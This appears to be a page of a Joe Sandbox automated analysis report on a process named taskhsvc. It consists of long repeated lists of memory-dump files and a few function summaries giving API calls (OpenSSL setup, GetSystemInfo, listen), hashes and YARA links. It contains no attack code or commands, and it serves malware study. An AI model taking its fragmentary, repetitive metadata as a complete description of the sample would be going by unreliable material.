Associated: 0000001F.00000002.5860306169.0000000000F96000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860376222.0000000000F9A000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860436959.0000000000F9C000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860505344.0000000000F9E000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860568151.0000000000F9F000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860603853.0000000000FA0000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860841214.0000000000FA3000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860901798.0000000000FA4000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860974828.0000000000FA8000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861014940.0000000000FA9000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861137520.0000000000FB0000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861198889.0000000000FB1000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861243870.0000000000FB4000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861314458.0000000000FB5000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861467336.0000000000FC6000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861579941.0000000000FCE000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861614958.0000000000FCF000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861670386.0000000000FD0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861748077.0000000000FD2000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861787893.0000000000FD3000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861850587.0000000000FD5000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861934375.0000000000FDB000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5862071337.0000000000FDC000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5863419265.000000000106D000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5863419265.0000000001072000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5863649862.0000000001073000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5863820160.0000000001078000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_31_2_d90000_taskhsvc.jbxd

Similarity

API ID: __stack_chk_fail$abortmemcpystrerror
String ID: )$@'$G'
API String ID: 20845292-454338890
Opcode ID: 97309f388b981e631e1ce29523d7eba836d6796abef7e2e1a0b25aa5a2f6980a
Instruction ID: 943e67df80d4b76c8f60abb7eabaef54d02c830ac3f94352b42bba26cceeb59f
Opcode Fuzzy Hash: 97309f388b981e631e1ce29523d7eba836d6796abef7e2e1a0b25aa5a2f6980a
Instruction Fuzzy Hash: 6C32C7B4908399CFDB10EF25C9847ADBBF0BF44314F00899AE589A7351D7B49A84DF62

Uniqueness

Uniqueness Score: -1.00%

Function 00F05EA1 Relevance: 9.1, APIs: 6, Instructions: 67stringCOMMON

Download Yara Rule

APIs

ERR_load_crypto_strings.LIBEAY32 ref: 00F05EC8
OPENSSL_add_all_algorithms_noconf.LIBEAY32 ref: 00F05ECD

Part of subcall function 00F0D6F1: CRYPTO_num_locks.LIBEAY32(?,?,?,?,?,?,-00000001,?,00F05ED7), ref: 00F0D702
Part of subcall function 00F0D6F1: CRYPTO_set_locking_callback.LIBEAY32 ref: 00F0D75B
Part of subcall function 00F0D6F1: CRYPTO_THREADID_set_callback.LIBEAY32 ref: 00F0D767
Part of subcall function 00F0D6F1: __stack_chk_fail.LIBSSP-0 ref: 00F0D77C

SSLeay.LIBEAY32 ref: 00F05ED7
SSLeay_version.LIBEAY32 ref: 00F05EE6
strcmp.MSVCRT ref: 00F05F05

Part of subcall function 00EE3842: __stack_chk_fail.LIBSSP-0 ref: 00EE38B7

Part of subcall function 00F15F8F: __stack_chk_fail.LIBSSP-0 ref: 00F15FB0

Part of subcall function 00F17322: __stack_chk_fail.LIBSSP-0 ref: 00F17343

__stack_chk_fail.LIBSSP-0 ref: 00F05FC3

Memory Dump Source

Source File: 0000001F.00000002.5858303183.0000000000EAC000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00D90000, based on PE: true

Associated: 0000001F.00000002.5854081625.0000000000D90000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5854203306.0000000000D91000.00000020.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5854387878.0000000000D99000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5854495577.0000000000D9A000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5855669844.0000000000DF5000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5855788620.0000000000DF8000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5855906271.0000000000DFF000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5855950533.0000000000E00000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5856575762.0000000000E36000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5856653087.0000000000E37000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5857175736.0000000000E5B000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5857265036.0000000000E5C000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5857335774.0000000000E5D000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5857418713.0000000000E60000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5857928657.0000000000EA3000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5857985242.0000000000EA4000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858044359.0000000000EA6000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858101275.0000000000EA7000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858156005.0000000000EA8000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858206252.0000000000EA9000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858259149.0000000000EAA000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858894722.0000000000F18000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5859972934.0000000000F8A000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860201875.0000000000F93000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860237968.0000000000F94000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860306169.0000000000F96000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860376222.0000000000F9A000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860436959.0000000000F9C000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860505344.0000000000F9E000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860568151.0000000000F9F000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860603853.0000000000FA0000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860841214.0000000000FA3000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860901798.0000000000FA4000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860974828.0000000000FA8000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861014940.0000000000FA9000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861137520.0000000000FB0000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861198889.0000000000FB1000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861243870.0000000000FB4000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861314458.0000000000FB5000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861467336.0000000000FC6000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861579941.0000000000FCE000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861614958.0000000000FCF000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861670386.0000000000FD0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861748077.0000000000FD2000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861787893.0000000000FD3000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861850587.0000000000FD5000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861934375.0000000000FDB000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5862071337.0000000000FDC000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5863419265.000000000106D000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5863419265.0000000001072000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5863649862.0000000001073000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5863820160.0000000001078000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_31_2_d90000_taskhsvc.jbxd

Similarity

API ID: __stack_chk_fail$D_set_callbackL_add_all_algorithms_noconfLeayLeay_versionO_num_locksO_set_locking_callbackR_load_crypto_stringsstrcmp
String ID:
API String ID: 694082125-0
Opcode ID: a17abd80e8bb722a970f9ff27fe03d714ef8c54174deea004fa364a3032416d3
Instruction ID: fba36e9ac660a843ea40f2f4184a93d05b6c29a36507e576989954b143791d91
Opcode Fuzzy Hash: a17abd80e8bb722a970f9ff27fe03d714ef8c54174deea004fa364a3032416d3
Instruction Fuzzy Hash: 78212BB0908706CFD700EFA5C94675FB7E0BF84755F10492CF4949B286D7B89544AFA2

Uniqueness

Uniqueness Score: -1.00%

Function 00EE8B20 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 31COMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 00EE8B46
GetSystemInfo.KERNEL32 ref: 00EE8B56
__stack_chk_fail.LIBSSP-0 ref: 00EE8B81

Strings

$, xrefs: 00EE8B30

Memory Dump Source

Source File: 0000001F.00000002.5858303183.0000000000EAC000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00D90000, based on PE: true

Associated: 0000001F.00000002.5854081625.0000000000D90000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5854203306.0000000000D91000.00000020.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5854387878.0000000000D99000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5854495577.0000000000D9A000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5855669844.0000000000DF5000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5855788620.0000000000DF8000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5855906271.0000000000DFF000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5855950533.0000000000E00000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5856575762.0000000000E36000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5856653087.0000000000E37000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5857175736.0000000000E5B000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5857265036.0000000000E5C000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5857335774.0000000000E5D000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5857418713.0000000000E60000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5857928657.0000000000EA3000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5857985242.0000000000EA4000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858044359.0000000000EA6000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858101275.0000000000EA7000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858156005.0000000000EA8000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858206252.0000000000EA9000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858259149.0000000000EAA000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858894722.0000000000F18000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5859972934.0000000000F8A000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860201875.0000000000F93000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860237968.0000000000F94000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860306169.0000000000F96000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860376222.0000000000F9A000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860436959.0000000000F9C000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860505344.0000000000F9E000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860568151.0000000000F9F000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860603853.0000000000FA0000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860841214.0000000000FA3000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860901798.0000000000FA4000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860974828.0000000000FA8000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861014940.0000000000FA9000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861137520.0000000000FB0000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861198889.0000000000FB1000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861243870.0000000000FB4000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861314458.0000000000FB5000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861467336.0000000000FC6000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861579941.0000000000FCE000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861614958.0000000000FCF000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861670386.0000000000FD0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861748077.0000000000FD2000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861787893.0000000000FD3000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861850587.0000000000FD5000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861934375.0000000000FDB000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5862071337.0000000000FDC000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5863419265.000000000106D000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5863419265.0000000001072000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5863649862.0000000001073000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5863820160.0000000001078000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_31_2_d90000_taskhsvc.jbxd

Similarity

API ID: InfoSystem__stack_chk_failmemset
String ID: $
API String ID: 1069299118-3993045852
Opcode ID: 970665616866bf2dd644e7af6ad3c01f448a5b9ff4f76c2b575e7c2e33aef25d
Instruction ID: 0d7aea999ae9579e24ed2b670bafe34f6694db22ab7d4c2bc85677c334e28126
Opcode Fuzzy Hash: 970665616866bf2dd644e7af6ad3c01f448a5b9ff4f76c2b575e7c2e33aef25d
Instruction Fuzzy Hash: 3DF06DB4A003499FCB00EFB9DA85A5EB7F4AB44364F108628E464E7394D734E805CB51

Uniqueness

Uniqueness Score: -1.00%

Function 00F0C797 Relevance: 3.1, APIs: 2, Instructions: 69COMMON

Download Yara Rule

APIs

__stack_chk_fail.LIBSSP-0 ref: 00F0C8C7

Part of subcall function 00EE6562: strrchr.MSVCRT ref: 00EE6586
Part of subcall function 00EE6562: strrchr.MSVCRT ref: 00EE659C
Part of subcall function 00EE6562: __stack_chk_fail.LIBSSP-0 ref: 00EE6601

Part of subcall function 00EE9764: __stack_chk_fail.LIBSSP-0 ref: 00EE9857

abort.MSVCRT ref: 00F0C7F0

Part of subcall function 00EE3842: __stack_chk_fail.LIBSSP-0 ref: 00EE38B7

Memory Dump Source

Source File: 0000001F.00000002.5858303183.0000000000EAC000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00D90000, based on PE: true

Associated: 0000001F.00000002.5854081625.0000000000D90000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5854203306.0000000000D91000.00000020.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5854387878.0000000000D99000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5854495577.0000000000D9A000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5855669844.0000000000DF5000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5855788620.0000000000DF8000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5855906271.0000000000DFF000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5855950533.0000000000E00000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5856575762.0000000000E36000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5856653087.0000000000E37000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5857175736.0000000000E5B000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5857265036.0000000000E5C000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5857335774.0000000000E5D000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5857418713.0000000000E60000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5857928657.0000000000EA3000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5857985242.0000000000EA4000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858044359.0000000000EA6000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858101275.0000000000EA7000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858156005.0000000000EA8000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858206252.0000000000EA9000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858259149.0000000000EAA000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858894722.0000000000F18000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5859972934.0000000000F8A000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860201875.0000000000F93000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860237968.0000000000F94000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860306169.0000000000F96000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860376222.0000000000F9A000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860436959.0000000000F9C000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860505344.0000000000F9E000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860568151.0000000000F9F000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860603853.0000000000FA0000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860841214.0000000000FA3000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860901798.0000000000FA4000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860974828.0000000000FA8000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861014940.0000000000FA9000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861137520.0000000000FB0000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861198889.0000000000FB1000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861243870.0000000000FB4000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861314458.0000000000FB5000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861467336.0000000000FC6000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861579941.0000000000FCE000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861614958.0000000000FCF000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861670386.0000000000FD0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861748077.0000000000FD2000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861787893.0000000000FD3000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861850587.0000000000FD5000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861934375.0000000000FDB000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5862071337.0000000000FDC000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5863419265.000000000106D000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5863419265.0000000001072000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5863649862.0000000001073000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5863820160.0000000001078000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_31_2_d90000_taskhsvc.jbxd

Similarity

API ID: __stack_chk_fail$strrchr$abort
String ID:
API String ID: 1190921433-0
Opcode ID: ce15cdac7778e0bf01c78418edf2bf0f3a91da70927ebe66d4b2be23bff6924e
Instruction ID: c8f2448a9b41a0e2cf12166a5d8b3c9f2d9f38efec0847e4ff11ba33a75bab53
Opcode Fuzzy Hash: ce15cdac7778e0bf01c78418edf2bf0f3a91da70927ebe66d4b2be23bff6924e
Instruction Fuzzy Hash: F83105B09083059FD714EF69C58975EBBE0BB44718F00CA2CE4D8AB385D7799848EF96

Uniqueness

Uniqueness Score: -1.00%

Function 00DBAF67 Relevance: 3.0, APIs: 2, Instructions: 45COMMON

Download Yara Rule

APIs

listen.WS2_32(?,?,?,?,?,?,?,?,?,?,?,?,?,00DBB46A), ref: 00DBAF92
__stack_chk_fail.LIBSSP-0 ref: 00DBB00E

Memory Dump Source

Source File: 0000001F.00000002.5854495577.0000000000D9A000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00D90000, based on PE: true

Associated: 0000001F.00000002.5854081625.0000000000D90000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5854203306.0000000000D91000.00000020.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5854387878.0000000000D99000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5855669844.0000000000DF5000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5855788620.0000000000DF8000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5855906271.0000000000DFF000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5855950533.0000000000E00000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5856575762.0000000000E36000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5856653087.0000000000E37000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5857175736.0000000000E5B000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5857265036.0000000000E5C000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5857335774.0000000000E5D000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5857418713.0000000000E60000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5857928657.0000000000EA3000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5857985242.0000000000EA4000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858044359.0000000000EA6000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858101275.0000000000EA7000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858156005.0000000000EA8000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858206252.0000000000EA9000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858259149.0000000000EAA000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858303183.0000000000EAC000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858894722.0000000000F18000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5859972934.0000000000F8A000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860201875.0000000000F93000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860237968.0000000000F94000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860306169.0000000000F96000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860376222.0000000000F9A000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860436959.0000000000F9C000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860505344.0000000000F9E000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860568151.0000000000F9F000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860603853.0000000000FA0000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860841214.0000000000FA3000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860901798.0000000000FA4000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860974828.0000000000FA8000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861014940.0000000000FA9000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861137520.0000000000FB0000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861198889.0000000000FB1000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861243870.0000000000FB4000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861314458.0000000000FB5000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861467336.0000000000FC6000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861579941.0000000000FCE000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861614958.0000000000FCF000.00000008.00000001.01000000.0000000A.sdmpDownload File
